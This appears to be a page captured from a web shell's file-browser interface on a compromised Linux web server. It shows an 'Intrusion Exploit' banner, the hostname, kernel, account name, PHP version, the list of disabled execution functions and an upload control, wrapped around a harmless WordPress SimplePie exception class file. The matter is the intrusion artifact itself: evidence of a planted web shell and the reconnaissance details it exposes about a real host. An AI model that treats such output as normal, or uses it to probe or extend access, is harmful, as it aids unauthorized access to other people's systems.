Intrusion Exploit
Server: LiteSpeed
System: Linux server1.gokhangurkan.com.tr 5.14.0-570.60.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Nov 5 05:00:59 EST 2025 x86_64
User: kibrismxyz (1047)
PHP: 8.1.33
Disabled: symlink,show_source,system,proc_terminate,shell_exec,exec,passthru,proc_open,popen,dl,ln,ls,cat
Upload Files
File: /home/kibrismxyz/public_html/wp-includes/SimplePie/src/HTTP/ClientException.php
<?php

// SPDX-FileCopyrightText: 2004-2023 Ryan Parman, Sam Sneddon, Ryan McCue
// SPDX-License-Identifier: BSD-3-Clause

declare(strict_types=1);

namespace SimplePie\HTTP;

use SimplePie\Exception as SimplePieException;

/**
 * Client exception class
 *
 * @internal
 */
final class ClientException extends SimplePieException
{
}